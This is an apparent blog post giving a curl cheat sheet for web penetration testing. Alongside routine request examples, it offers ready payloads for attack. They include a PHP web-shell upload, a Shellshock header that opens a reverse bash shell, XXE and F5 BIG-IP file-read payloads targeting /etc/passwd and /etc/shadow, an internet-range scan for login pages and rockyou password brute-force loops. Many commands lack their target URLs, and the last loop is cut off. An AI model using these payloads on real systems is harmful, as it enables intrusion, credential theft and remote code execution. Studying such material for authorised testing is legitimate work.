Web Penetration Testing with Curl Cheatsheet

 In lot of scenarios, we usually don't have access to GUI access to web applications but in most of the scenarios - you can find curl installed on the test machine - so, below is a simple cheat sheet to run basic checks 

#Get request using Curl
curl -I

# Send Post Request
curl --data "param1=value1&param2=value2"

#Check for Trace Method
curl -k -v -X TRACE

#PUT Request 
curl -X PUT -d "PUT request data"
curl -kL -T file.txt

#HEAD Request 
curl -I

#Test DEBUG Method --> if Response "OK" --> DEBUG is enabled
curl -X DEBUG -k -v -H "Command: stop-debug"

#Ignore SSL warnings
curl -k

#Follow Redirection 
curl -L

#Add headers in a JSON GET request 
curl -i -H "Accept: application/json" -H "Content-Type: application/json"

#Add headers in a request XML GET request 
curl -H "Accept: application/xml" -H "Content-Type: application/xml" -X GET

#XML POST request 
curl -k -X POST -H "Content-Type: application/xml" -H "Accept: application/xml" -d "<Request><Login>my_login</Login><Password>my_password</Password></Request>"

#File Upload
curl -X POST -d @filename

#Proxy Testing
 curl -kL https://google.com --proxy
Login and Session Management using CURL 
#GET request Login using Curl 
curl --user user:pass
curl -u user:pass

#JSON POST Request Login 
curl -X POST -H "Content-Type: application/json" --d'{"login":"my_login","password":"my_password"}'  --user "login:password"     

#Curl POST Request 
curl -X POST -H "Content-Type: application/json" -d '{"productId": 123456, "quantity": 100}'  
curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "param1=value1&param2=value2" 

#Save the session as cookie 
curl --user user:pass --cookie-jar ./somefile

#Login using the saved session
curl --cookie ./somefile

#Login with Authorization: Basic
curl --basic -v -u root:root  

#Login with Digest Authorization 
curl -v --digest --user 'admin:admin'

#Upload a file using PUT method
curl -v -X PUT -d '<?php system ($_GET[“cmd”]); ?>' 
Information Gathering using CURL

#Iterate a number from 1 to 20 in the given Variable and check the difference 
for i in $(seq 1 20); do echo -n "$i: "; curl -s$i/ | grep '<title>';done

#Get all the links from a page 
curl -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

#get Text in much better readable Format 
curl -s -L | html2text -width '99' | uniq 

#Finding Basic Authorization Hosts
parallel -j250 'if [[ "`timeout 3 curl -v 100.{3}.{1}.{2}:80 2> >(grep -o -i -E Unauthorized) > /dev/null`" ]]; then echo 100.{3}.{1}.{2}; fi; if [[ "`timeout 3 curl -v 100.{3}.{1}.{2}:8080 2> >(grep -o -i -E Unauthorized) > /dev/null`" ]]; then echo 100.{3}.{1}.{2}:8080; fi' ::: {1..255} ::: {1..255} ::: {64..127} > auth_basic.txt

#Exploiting ShellShock using CURL
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/ 0>&1 "

#XXE - When you find /soap or /soap/servlet/rpcrouter Directory
curl -kL -H "Content-Type:text/xml" http:// -X POST -d  '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <faultactor>&xxe;</faultactor>' 

curl -kL -H "Content-Type:text/xml" http:// -X POST -d  '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]> <faultactor>&xxe;</faultactor>' 

curl -kL -H "Content-Type:text/xml" http:// -X POST -d '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY test SYSTEM "https://mail.google.com"> ]> <faultactor>&test;</faultactor>'

#LFI on Apache httpd (F5 BIG-IP load balancer)
curl -kL --cipher 'DEFAULT:!DH' ';/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
Brute forcing using Curl

#One Liner
for pass in $(cat /usr/share/wordlists/rockyou.txt); do curl -k -u root:"$pass" ;echo $pass & done

#Better for readability
for pass in $(cat /usr/share/wordlists/rockyou.txt); do
	http_code=$(curl -k --digest -u admin:"$pass" -w '%{http_code}' -o /dev/null -s )
		if [[ $http_code -ne 401 ]]; then 
			echo "Password Cracked $pass"
			break 2 
		elif [[ $http_code -eq 401 ]]; then 
			echo "Wrong Password: '$pass' --- '$http_code'"
OpenSSL Errors

#Resolving SSL routines::dh key too small
curl -kL --cipher 'DEFAULT:!DH'

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment